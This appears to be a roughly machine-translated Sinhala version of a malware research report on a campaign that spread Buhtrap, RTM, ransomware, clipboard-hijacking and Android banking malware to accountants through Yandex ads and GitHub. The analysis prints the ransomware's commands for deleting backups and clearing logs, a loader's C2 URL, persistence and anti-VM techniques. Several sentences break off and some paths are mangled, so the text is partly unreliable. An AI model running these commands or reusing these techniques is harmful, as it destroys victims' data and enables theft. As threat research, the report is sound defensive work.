සයිබර් ප්රහාරයකදී ගණකාධිකාරීවරුන් ඉලක්ක කර ගැනීමට, ඔබට ඔවුන් මාර්ගගතව සොයන වැඩ ලේඛන භාවිතා කළ හැක. මෙය දළ වශයෙන් සයිබර් සමූහයක් විසින් පසුගිය මාස කිහිපය පුරාවට දන්නා පසුපස දොරටු බෙදා හරිමින් සිදු කර ඇත.
Buhtrap හි මූල කේතය පසුගිය කාලයේ අන්තර්ජාලය හරහා කාන්දු වී ඇති බැවින් ඕනෑම කෙනෙකුට එය භාවිතා කළ හැකිය. RTM කේත ලබා ගැනීමේ හැකියාව පිළිබඳව අපට තොරතුරු නොමැත.
ප්රහාරකයින් Yandex.Direct භාවිතයෙන් අනිෂ්ට මෘදුකාංග බෙදා හැර GitHub හි සත්කාරකත්වය සපයන ආකාරය මෙම පෝස්ට් එකෙන් අපි ඔබට කියන්නෙමු. අනිෂ්ට මෘදුකාංගයේ තාක්ෂණික විශ්ලේෂණයකින් ලිපිය අවසන් වේ.
Buhtrap සහ RTM නැවතත් ව්යාපාරයට පැමිණ ඇත
පැතිරීම සහ වින්දිතයින්ගේ යාන්ත්රණය
වින්දිතයින්ට ලබා දෙන විවිධ ගෙවීම් පොදු ප්රචාරණ යාන්ත්රණයක් බෙදා ගනී. ප්රහාරකයන් විසින් නිර්මාණය කරන ලද සියලුම අනිෂ්ට ගොනු විවිධ GitHub ගබඩා දෙකක තැන්පත් කර ඇත.
සාමාන්යයෙන්, ගබඩාවේ එක් බාගත හැකි අනිෂ්ට ගොනුවක් අඩංගු විය, එය නිතර වෙනස් වේ. GitHub ඔබට ගබඩාවක වෙනස්කම් වල ඉතිහාසය බැලීමට ඉඩ දෙන බැවින්, යම් කාල සීමාවක් තුළ බෙදා හරින ලද අනිෂ්ට මෘදුකාංග මොනවාදැයි අපට දැක ගත හැකිය. අනිෂ්ට ගොනුව බාගත කිරීමට වින්දිතයාට ඒත්තු ගැන්වීම සඳහා, ඉහත රූපයේ දැක්වෙන වෙබ් අඩවිය blanki-shabloni24[.]ru, භාවිතා කරන ලදී.
වෙබ් අඩවියේ සැලසුම සහ අනිෂ්ට ලිපිගොනු වල සියලුම නම් තනි සංකල්පයක් අනුගමනය කරයි - ආකෘති, සැකිලි, ගිවිසුම්, සාම්පල, ආදිය. Buhtrap සහ RTM මෘදුකාංග දැනටමත් ගණකාධිකාරීවරුන්ට පහර දීමේදී භාවිතා කර ඇති බව සලකන විට, අපි උපකල්පනය කළේ නව ව්යාපාරයේ උපායමාර්ගය ද එසේමය. එකම ප්රශ්නය වන්නේ වින්දිතයා ප්රහාරකයන්ගේ වෙබ් අඩවියට පැමිණියේ කෙසේද යන්නයි.
ආසාදනය
අවම වශයෙන් මෙම වෙබ් අඩවියේ අවසන් වූ විභව වින්දිතයින් කිහිප දෙනෙකු ද්වේෂසහගත වෙළඳ දැන්වීම් මගින් ආකර්ෂණය විය. පහත දැක්වෙන්නේ උදාහරණ URL ය:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
සබැඳියෙන් ඔබට පෙනෙන පරිදි, බැනරය නීත්යානුකූල ගිණුම්කරණ සංසදයේ bb.f2[.]kz පළ කර ඇත. බැනර් විවිධ වෙබ් අඩවිවල දිස් වූ අතර, සියල්ලටම එකම ප්රචාරක හැඳුනුම්පතක් (blanki_rsya) තිබූ අතර බොහෝමයක් ගිණුම්කරණ හෝ නීති ආධාර සේවාවලට සම්බන්ධ බව සැලකිල්ලට ගැනීම වැදගත්ය. විභව වින්දිතයා ඉලක්කගත ප්රහාර පිළිබඳ අපගේ උපකල්පනයට සහාය දක්වන “ඉන්වොයිස් පෝරමය බාගන්න” ඉල්ලීම භාවිතා කළ බව URL පෙන්වයි. පහත දැක්වෙන්නේ බැනර් දර්ශනය වූ අඩවි සහ ඊට අනුරූප සෙවුම් විමසුම් ය.
- ඉන්වොයිස් පෝරමය බාගන්න - bb.f2[.]kz
- නියැදි කොන්ත්රාත්තුව - Ipopen[.]ru
- අයදුම්පත් පැමිණිලි නියැදිය - 77metrov[.]ru
- ගිවිසුම් පෝරමය - හිස්-ඩොගොවෝර්-කුප්ලි-ප්රොදාෂි[.]රු
- නියැදි අධිකරණ පෙත්සම - zen.yandex[.]ru
- නියැදි පැමිණිල්ල - yurday[.]ru
- නියැදි කොන්ත්රාත් ආකෘති - Regforum[.]ru
- කොන්ත්රාත් ආකෘතිය - සහායක[.]ru
- නියැදි මහල් නිවාස ගිවිසුම - napravah[.]com
- නෛතික ගිවිසුම් සාම්පල - avito[.]ru
blanki-shabloni24[.]ru අඩවිය සරල දෘශ්ය තක්සේරුවක් සම්මත කිරීමට වින්යාස කර තිබිය හැක. සාමාන්යයෙන්, GitHub වෙත සබැඳියක් සහිත වෘත්තීය පෙනුමක් ඇති වෙබ් අඩවියක් වෙත යොමු කරන දැන්වීමක් පැහැදිලිවම නරක දෙයක් ලෙස නොපෙනේ. ඊට අමතරව, ප්රහාරකයින් ද්වේශසහගත ගොනු ගබඩාවට උඩුගත කළේ සීමිත කාලයක් සඳහා පමණි, ප්රචාරක කාලය තුළ විය හැකිය. බොහෝ විට, GitHub ගබඩාවේ හිස් zip සංරක්ෂිතයක් හෝ හිස් EXE ගොනුවක් අඩංගු විය. මේ අනුව, ප්රහාරකයින්ට නිශ්චිත සෙවුම් විමසුම්වලට ප්රතිචාර වශයෙන් පැමිණි ගණකාධිකාරීවරුන් විසින් බොහෝ විට සංචාරය කරන ලද අඩවි මත Yandex.Direct හරහා වෙළඳ දැන්වීම් බෙදා හැරිය හැක.
මීළඟට අපි බලමු මේ විදියට බෙදාහරින විවිධ payloads ගැන.
පැටවීමේ විශ්ලේෂණය
බෙදා හැරීමේ කාල නිර්ණය
ද්වේශසහගත ව්යාපාරය 2018 ඔක්තෝබර් අවසානයේ ආරම්භ වූ අතර එය ලියන අවස්ථාව වන විට සක්රීයයි. සම්පූර්ණ ගබඩාව GitHub හි ප්රසිද්ධියේ ලබා ගත හැකි බැවින්, අපි විවිධ අනිෂ්ට මෘදුකාංග පවුල් හයක් බෙදා හැරීමේ නිවැරදි කාලසටහනක් සම්පාදනය කළෙමු (පහත රූපය බලන්න). අපි git ඉතිහාසය සමඟ සංසන්දනය කිරීම සඳහා ESET ටෙලිමෙට්රි මගින් මනිනු ලබන පරිදි, බැනර් සබැඳිය සොයාගත් විට පෙන්වන රේඛාවක් එකතු කර ඇත. ඔබට පෙනෙන පරිදි, මෙය GitHub හි ඇති ගෙවීමේ හැකියාව සමඟ හොඳින් සම්බන්ධ වේ. පෙබරවාරි අවසානයේ ඇති විෂමතාවය පැහැදිලි කළ හැක්කේ අපට එය සම්පූර්ණයෙන් ලබා ගැනීමට පෙර ගබඩාව GitHub වෙතින් ඉවත් කර ඇති නිසා වෙනස් කිරීමේ ඉතිහාසයේ කොටසක් අපට නොතිබීමෙනි.
රූපය 1. අනිෂ්ට මෘදුකාංග බෙදා හැරීමේ කාල නිර්ණය.
කේත අත්සන් කිරීමේ සහතික
ප්රචාරණය බහු සහතික භාවිතා කළේය. සමහරක් අනිෂ්ට මෘදුකාංග පවුලකට වඩා අත්සන් කර ඇති අතර, විවිධ සාම්පල එකම ව්යාපාරයට අයත් බව තවදුරටත් පෙන්නුම් කරයි. පුද්ගලික යතුර තිබුණද, ක්රියාකරුවන් ද්විමය ක්රමානුකූලව අත්සන් නොකළ අතර සියලුම සාම්පල සඳහා යතුර භාවිතා නොකළේය. 2019 පෙබරවාරි මස අගදී, ප්රහාරකයින් ඔවුන් සතුව පුද්ගලික යතුර නොතිබූ Google සතු සහතිකයක් භාවිතයෙන් අවලංගු අත්සන් සෑදීමට පටන් ගත්හ.
ව්යාපාරයට සම්බන්ධ සියලුම සහතික සහ ඔවුන් අත්සන් කරන අනිෂ්ට මෘදුකාංග පවුල් පහත වගුවේ ලැයිස්තුගත කර ඇත.
අපි වෙනත් අනිෂ්ට මෘදුකාංග පවුල් සමඟ සම්බන්ධතා ඇති කර ගැනීමට මෙම කේත අත්සන් කිරීමේ සහතික භාවිතා කර ඇත. බොහෝ සහතික සඳහා, GitHub ගබඩාවක් හරහා බෙදා නොහරින ලද සාම්පල අපට හමු නොවීය. කෙසේ වෙතත්, TOV "MARIYA" සහතිකය botnet අයත් අනිෂ්ට මෘදුකාංග අත්සන් කිරීමට භාවිතා කරන ලදී
Win32/Filecoder.Buhtrap
අපගේ අවධානයට ලක් වූ පළමු සංරචකය වූයේ අලුතින් සොයාගත් Win32/Filecoder.Buhtrap ය. මෙය සමහර විට ඇසුරුම් කර ඇති Delphi ද්විමය ගොනුවකි. එය ප්රධාන වශයෙන් බෙදා හරින ලද්දේ 2019 පෙබරවාරි-මාර්තු මාසවල ය. එය ransomware වැඩසටහනකට සුදුසු පරිදි හැසිරේ - එය දේශීය ධාවක සහ ජාල ෆෝල්ඩර සොයමින් සහ අනාවරණය කරගත් ගොනු සංකේතනය කරයි. එය සංකේතාංකන යතුරු යැවීමට සේවාදායකය සම්බන්ධ කර නොගන්නා නිසා එයට අන්තර්ජාල සම්බන්ධතාවයක් අවශ්ය නොවේ. ඒ වෙනුවට, එය කප්පම් පණිවිඩයේ අවසානයට "ටෝකනයක්" එක් කරයි, සහ ක්රියාකරුවන් සම්බන්ධ කර ගැනීමට ඊමේල් හෝ Bitmessage භාවිතා කිරීමට යෝජනා කරයි.
හැකි තරම් සංවේදී සම්පත් සංකේතනය කිරීමට, Filecoder.Buhtrap සංකේතනයට බාධා කළ හැකි වටිනා තොරතුරු අඩංගු විවෘත ගොනු හසුරුවන්න ඇති ප්රධාන මෘදුකාංග වසා දැමීමට නිර්මාණය කර ඇති නූලක් ධාවනය කරයි. ඉලක්ක ක්රියාවලීන් ප්රධාන වශයෙන් දත්ත සමුදා කළමනාකරණ පද්ධති (DBMS) වේ. මීට අමතරව, Filecoder.Buhtrap දත්ත ප්රතිසාධනය අපහසු කිරීම සඳහා ලොග් ගොනු සහ උපස්ථ මකා දමයි. මෙය සිදු කිරීම සඳහා, පහත බැච් ස්ක්රිප්ට් එක ධාවනය කරන්න.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap වෙබ් අඩවි නරඹන්නන් පිළිබඳ තොරතුරු රැස් කිරීමට නිර්මාණය කර ඇති නීත්යානුකූල සබැඳි IP Logger සේවාවක් භාවිතා කරයි. මෙය විධාන රේඛාවේ වගකීම වන ransomware හි ගොදුරු වූවන් නිරීක්ෂණය කිරීමට අදහස් කරයි:
mshta.exe "javascript:document.write('');"
එන්ක්රිප්ෂන් සඳහා ගොනු ඒවා බැහැර කිරීමේ ලැයිස්තු තුනකට නොගැලපේ නම් තෝරා ගනු ලැබේ. පළමුව, පහත දිගු සහිත ගොනු සංකේතනය කර නොමැත: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys සහ .වවුලා. දෙවනුව, පහත ලැයිස්තුවෙන් සම්පූර්ණ මාර්ගයෙහි නාමාවලි තන්තු අඩංගු සියලුම ගොනු බැහැර කර ඇත.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
තෙවනුව, ඇතැම් ගොනු නාම සංකේතාංකනයෙන් බැහැර කර ඇත, ඒවා අතර කප්පම් පණිවිඩයේ ගොනු නාමය. ලැයිස්තුව පහත දැක්වේ. පැහැදිලිවම, මෙම ව්යතිරේක සියල්ල යන්ත්රය ක්රියාත්මක කිරීමට අදහස් කරන නමුත් අවම මාර්ග යෝග්යතාවයක් ඇත.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
ගොනු සංකේතාංකන යෝජනා ක්රමය
ක්රියාත්මක වූ පසු, අනිෂ්ට මෘදුකාංගය 512-bit RSA යතුරු යුගලයක් ජනනය කරයි. පුද්ගලික ඝාතකය (d) සහ මාපාංකය (n) පසුව දෘඪ-කේතගත 2048-bit public key (public exponent සහ modulus), zlib-packed සහ base64 කේතනය කර සංකේතනය කර ඇත. මේ සඳහා වගකිව යුතු කේතය රූප සටහන 2 හි දැක්වේ.
රූපය 2. 512-bit RSA යතුරු යුගල උත්පාදන ක්රියාවලියේ Hex-කිරණ විසංයෝජනයේ ප්රතිඵලය.
පහත දැක්වෙන්නේ ජනනය කරන ලද පුද්ගලික යතුරක් සහිත සරල පෙළ සඳහා උදාහරණයකි, එය කප්පම් පණිවිඩයට අමුණා ඇති සංකේතයකි.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
ප්රහාරකයන්ගේ පොදු යතුර පහත දැක්වේ.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
ගොනු 128-bit යතුරක් සමඟ AES-256-CBC භාවිතයෙන් සංකේතනය කර ඇත. එක් එක් සංකේතාත්මක ගොනුවක් සඳහා, නව යතුරක් සහ නව ආරම්භක දෛශිකයක් ජනනය වේ. සංකේතාත්මක ගොනුවේ අවසානයට ප්රධාන තොරතුරු එකතු කරනු ලැබේ. සංකේතනය කළ ගොනුවේ ආකෘතිය සලකා බලමු.
සංකේතනය කළ ගොනුවලට පහත ශීර්ෂය ඇත:
VEGA මැජික් අගය එකතු කිරීම සමඟ මූලාශ්ර ගොනු දත්ත පළමු බයිට් 0x5000 වෙත සංකේතනය කර ඇත. සියලුම විකේතන තොරතුරු පහත ව්යුහය සහිත ගොනුවකට අමුණා ඇත:
- ගොනු ප්රමාණයේ සලකුණෙහි ගොනුව බයිට් 0x5000 ට වඩා විශාලද යන්න දැක්වෙන සලකුණක් අඩංගු වේ.
— AES යතුරු බ්ලොබ් = ZlibCompress(RSAEncrypt(AES යතුර + IV, ජනනය කරන ලද RSA යතුරු යුගලයේ පොදු යතුර))
- RSA යතුර බ්ලොබ් = ZlibCompress(RSAEncrypt(ජනනය කරන ලද RSA පුද්ගලික යතුර, දෘඪ-කේතිත RSA පොදු යතුර))
Win32/ClipBanker
Win32/ClipBanker යනු 2018 ඔක්තෝබර් අග සිට දෙසැම්බර් මුල දක්වා කඩින් කඩ බෙදා හරින ලද සංරචකයකි. එහි කාර්යභාරය වන්නේ ක්ලිප්බෝඩ් එකේ අන්තර්ගතය නිරීක්ෂණය කිරීමයි, එය ගුප්තකේතන මුදල් පසුම්බිවල ලිපිනයන් සොයයි. ඉලක්ක පසුම්බි ලිපිනය තීරණය කිරීමෙන් පසු, ClipBanker එය ක්රියාකරුවන්ට අයත් යැයි විශ්වාස කරන ලිපිනයකින් ප්රතිස්ථාපනය කරයි. අප පරීක්ෂා කළ සාම්පල කොටු කර හෝ අපැහැදිලි වූ ඒවා නොවේ. හැසිරීම් වසං කිරීමට භාවිතා කරන එකම යාන්ත්රණය තන්තු සංකේතනයයි. ක්රියාකරු පසුම්බි ලිපින RC4 භාවිතයෙන් සංකේතනය කර ඇත. ඉලක්කගත cryptocurrencies නම් Bitcoin, Bitcoin cash, Dogecoin, Ethereum සහ Ripple වේ.
අනිෂ්ට මෘදුකාංගය ප්රහාරකයින්ගේ බිට්කොයින් පසුම්බි වෙත පැතිර ගිය කාලය තුළ, කුඩා මුදලක් VTS වෙත යවන ලද අතර එය ව්යාපාරයේ සාර්ථකත්වය පිළිබඳව සැක පහළ කරයි. මීට අමතරව, මෙම ගනුදෙනු කිසිසේත්ම ClipBanker හා සම්බන්ධ බවට යෝජනා කිරීමට කිසිදු සාක්ෂියක් නොමැත.
Win32/RTM
Win32/RTM සංරචකය 2019 මාර්තු මස මුලදී දින කිහිපයක් සඳහා බෙදා හරින ලදී. RTM යනු දුරස්ථ බැංකු පද්ධති ඉලක්ක කරගත් Delphi හි ලියා ඇති ට්රෝජන් බැංකුකරුවෙකි. 2017 දී ESET පර්යේෂකයන් විසින් ප්රකාශයට පත් කරන ලදී
බුට්රැප් ලෝඩරය
යම් කාලයක් සඳහා, පෙර Buhtrap මෙවලම් හා සමාන නොවන බාගත කරන්නෙකු GitHub මත ලබා ගත හැකි විය. ඔහු හැරෙනවා https://94.100.18[.]67/RSS.php?<some_id>
ඊළඟ අදියර ලබා ගැනීමට සහ එය සෘජුවම මතකයට පටවනු ලැබේ. දෙවන අදියර කේතයේ හැසිරීම් දෙකක් අපට වෙන්කර හඳුනාගත හැකිය. පළමු URL එකෙහි, RSS.php සෘජුවම Buhtrap backdoor පසුකර ගියේය - මෙම backdoor මූලාශ්ර කේතය කාන්දු වූ පසු තිබෙන එකට බොහෝ සමාන වේ.
සිත්ගන්නා කරුණ නම්, අපි Buhtrap පිටුපස දොර සමඟ ව්යාපාර කිහිපයක් දකිමු, ඒවා විවිධ ක්රියාකරුවන් විසින් මෙහෙයවනු ලැබේ. මෙම අවස්ථාවෙහිදී, ප්රධාන වෙනස වන්නේ පිටුපස දොර සෘජුවම මතකයට පටවා ඇති අතර අප කතා කළ DLL යෙදවීමේ ක්රියාවලිය සමඟ සුපුරුදු යෝජනා ක්රමය භාවිතා නොකිරීමයි.
දෙවන, වඩාත් සංකීර්ණ හැසිරීම වූයේ RSS.php URL වෙනත් පූරකයකට ලබා දීමයි. එය ගතික ආනයන වගුව නැවත ගොඩ නැගීම වැනි යම් අපැහැදිලි කිරීම් ක්රියාත්මක කළේය. ඇරඹුම් කාරකයේ අරමුණ C&C සේවාදායකය සම්බන්ධ කර ගැනීමයි
Android/Spy.Banker
සිත්ගන්නා කරුණ නම්, ඇන්ඩ්රොයිඩ් සඳහා වන සංරචකයක් GitHub ගබඩාවේ ද සොයා ගැනීමයි. ඔහු ප්රධාන ශාඛාවේ සිටියේ එක් දිනක් පමණි - 1 නොවැම්බර් 2018. GitHub හි පළ කිරීමට අමතරව, ESET ටෙලිමෙට්රි මෙම අනිෂ්ට මෘදුකාංග බෙදා හරින බවට කිසිදු සාක්ෂියක් සොයා නොගනී.
සංරචකය Android යෙදුම් පැකේජයක් (APK) ලෙස සත්කාරකත්වය සපයන ලදී. එය දැඩි ලෙස අපැහැදිලි ය. ද්වේශසහගත හැසිරීම APK හි ඇති සංකේතාත්මක JAR එකක සඟවා ඇත. මෙම යතුර භාවිතයෙන් එය RC4 සමඟ සංකේතනය කර ඇත:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
තන්තු සංකේතනය කිරීමට එකම යතුර සහ ඇල්ගොරිතම භාවිතා වේ. JAR පිහිටා ඇත APK_ROOT + image/files
. ගොනුවේ පළමු බයිට් 4 තුළ සංකේතාත්මක JAR හි දිග අඩංගු වේ, එය දිග ක්ෂේත්රයෙන් පසුව වහාම ආරම්භ වේ.
ගොනුව විකේතනය කිරීමෙන් පසුව, එය Anubis බව අපි සොයා ගත්තෙමු - කලින්
- මයික්රොෆෝන පටිගත කිරීම
- තිරපිටපත් ගැනීම
- GPS ඛණ්ඩාංක ලබා ගැනීම
- keylogger
- උපාංග දත්ත සංකේතනය සහ කප්පම් ඉල්ලුම
- ස්පෑම් යැවීම
සිත්ගන්නා කරුණ නම්, බැංකුකරු වෙනත් C&C සේවාදායකයක් ලබා ගැනීම සඳහා උපස්ථ සන්නිවේදන නාලිකාවක් ලෙස Twitter භාවිතා කළේය. අපි විශ්ලේෂණය කළ නියැදිය @JonesTrader ගිණුම භාවිතා කළ නමුත් විශ්ලේෂණය කරන විට එය දැනටමත් අවහිර කර ඇත.
බැංකුකරු Android උපාංගයේ ඉලක්ක යෙදුම් ලැයිස්තුවක් අඩංගු වේ. එය සොෆොස් අධ්යයනයෙන් ලබාගත් ලැයිස්තුවට වඩා දිගු වේ. මෙම ලැයිස්තුවට බොහෝ බැංකු යෙදුම්, Amazon සහ eBay වැනි අන්තර්ජාල සාප්පු සවාරි වැඩසටහන් සහ ගුප්තකේතන මුදල් සේවා ඇතුළත් වේ.
MSIL/ClipBanker.IH
මෙම ව්යාපාරයේ කොටසක් ලෙස බෙදා හරින ලද අවසාන සංරචකය වූයේ 2019 මාර්තු මාසයේදී දර්ශනය වූ .NET Windows ක්රියාත්මක කළ හැකි ය. අධ්යයනය කරන ලද බොහෝ අනුවාද ConfuserEx v1.0.0 සමඟ ඇසුරුම් කර ඇත. ClipBanker මෙන්, මෙම සංරචකය පසුරු පුවරුව භාවිතා කරයි. ඔහුගේ ඉලක්කය වන්නේ පුළුල් පරාසයක ගුප්තකේතන මුදල්, මෙන්ම Steam මත පිරිනැමීම්. මීට අමතරව, ඔහු Bitcoin පුද්ගලික WIF යතුර සොරකම් කිරීමට IP Logger සේවාව භාවිතා කරයි.
ආරක්ෂණ යාන්ත්රණ
ConfuserEx මගින් දෝශ නිරාකරණය, ඉවත දැමීම සහ විකෘති කිරීම වැළැක්වීමේ ප්රතිලාභ වලට අමතරව, සංරචකයට ප්රති-වයිරස නිෂ්පාදන සහ අථත්ය යන්ත්ර හඳුනා ගැනීමේ හැකියාව ඇතුළත් වේ.
එය අතථ්ය යන්ත්රයක ක්රියාත්මක වන බව තහවුරු කිරීම සඳහා, අනිෂ්ට මෘදුකාංගය BIOS තොරතුරු ඉල්ලා සිටීමට ඇති Windows WMI විධාන රේඛාව (WMIC) භාවිතා කරයි, එනම්:
wmic bios
එවිට වැඩසටහන විධාන ප්රතිදානය විග්රහ කර මූල පද සොයයි: VBOX, VirtualBox, XEN, qemu, bochs, VM.
ප්රති-වයිරස නිෂ්පාදන හඳුනා ගැනීමට, අනිෂ්ට මෘදුකාංග භාවිතා කරමින් Windows Security Center වෙත Windows Management Instrumentation (WMI) ඉල්ලීමක් යවයි. ManagementObjectSearcher
පහත දැක්වෙන පරිදි API. Base64 වෙතින් විකේතනය කිරීමෙන් පසු ඇමතුම මේ ආකාරයෙන් පෙනේ:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
රූපය 3. ප්රතිවෛරස නිෂ්පාදන හඳුනාගැනීමේ ක්රියාවලිය.
ඊට අමතරව, අනිෂ්ට මෘදුකාංගය පරීක්ෂා කරයි
නොනැසී පැවතීම
අප අධ්යයනය කළ අනිෂ්ට මෘදුකාංග අනුවාදය එයම පිටපත් කරයි %APPDATA%googleupdater.exe
සහ google නාමාවලිය සඳහා "සැඟවුණු" ගුණාංගය සකසයි. එවිට ඇය අගය වෙනස් කරයි SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell
වින්ඩෝස් රෙජිස්ට්රි තුළ සහ මාර්ගය එකතු කරයි updater.exe
. මේ ආකාරයට, පරිශීලකයා ලොග් වන සෑම අවස්ථාවකම අනිෂ්ට මෘදුකාංගය ක්රියාත්මක වේ.
ද්වේෂසහගත හැසිරීම
ClipBanker මෙන්, අනිෂ්ට මෘදුකාංගය ක්ලිප්බෝඩ් එකේ අන්තර්ගතය නිරීක්ෂණය කරන අතර ගුප්තකේතන මුදල් පසුම්බි ලිපින සොයන අතර, සොයාගත් විට, එය ක්රියාකරුගේ ලිපිනයකින් ප්රතිස්ථාපනය කරයි. පහත දැක්වෙන්නේ කේතයේ ඇති දේ මත පදනම් වූ ඉලක්ක ලිපින ලැයිස්තුවකි.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
එක් එක් ආකාරයේ ලිපින සඳහා අනුරූප නිත්ය ප්රකාශනයක් ඇත. STEAM_URL අගය Steam පද්ධතියට පහර දීමට භාවිතා කරයි, බෆරය තුළ අර්ථ දැක්වීමට භාවිතා කරන සාමාන්ය ප්රකාශනයෙන් දැකිය හැක:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
පිටකිරීමේ නාලිකාව
බෆරයේ ලිපින ප්රතිස්ථාපනය කිරීමට අමතරව, අනිෂ්ට මෘදුකාංගය Bitcoin, Bitcoin Core සහ Electrum Bitcoin wallets හි පුද්ගලික WIF යතුරු ඉලක්ක කරයි. වැඩසටහන WIF පුද්ගලික යතුර ලබා ගැනීම සඳහා exfiltration නාලිකාවක් ලෙස plogger.org භාවිතා කරයි. මෙය සිදු කිරීම සඳහා, පහත දැක්වෙන පරිදි, ක්රියාකරුවන් පුද්ගලික යතුරු දත්ත පරිශීලක නියෝජිත HTTP ශීර්ෂයට එක් කරයි.
රූපය 4. නිමැවුම් දත්ත සහිත IP Logger කොන්සෝලය.
ක්රියාකරුවන් පසුම්බි ඉවත් කිරීමට iplogger.org භාවිතා කළේ නැත. ක්ෂේත්රයේ අක්ෂර 255 සීමාව නිසා ඔවුන් වෙනත් ක්රමයක් අනුගමනය කරන්න ඇති User-Agent
IP Logger වෙබ් අතුරු මුහුණතෙහි ප්රදර්ශනය කෙරේ. අප අධ්යයනය කළ සාම්පලවල අනෙක් ප්රතිදාන සේවාදායකය පරිසර විචල්යයේ ගබඩා කර ඇත DiscordWebHook
. පුදුමයට කරුණක් නම්, මෙම පරිසර විචල්යය කේතයේ කොතැනකවත් පවරා නොමැත. මෙයින් ඇඟවෙන්නේ අනිෂ්ට මෘදුකාංගය තවමත් සංවර්ධනය වෙමින් පවතින අතර විචල්යය ක්රියාකරුගේ පරීක්ෂණ යන්ත්රයට පවරා ඇති බවයි.
වැඩසටහන සංවර්ධනය වෙමින් පවතින බවට තවත් ලකුණක් තිබේ. ද්විමය ගොනුවට iplogger.org URL දෙකක් ඇතුළත් වන අතර, දත්ත පිටකිරීමේදී දෙකම විමසනු ලැබේ. මෙම URL වලින් එකකට කරන ඉල්ලීමකදී, Referer ක්ෂේත්රයේ අගයට පෙර “DEV /” යෙදේ. ConfuserEx භාවිතයෙන් ඇසුරුම් නොකළ අනුවාදයක් ද අපට හමු විය, මෙම URL සඳහා ලබන්නා DevFeedbackUrl ලෙස නම් කර ඇත. පාරිසරික විචල්ය නාමය මත පදනම්ව, ක්රියාකරුවන් නීත්යානුකූල සේවාවක් වන Discord සහ එහි වෙබ් අන්තර්ක්රියා පද්ධතිය cryptocurrency පසුම්බි සොරකම් කිරීමට භාවිතා කිරීමට සැලසුම් කරමින් සිටින බව අපි විශ්වාස කරමු.
නිගමනය
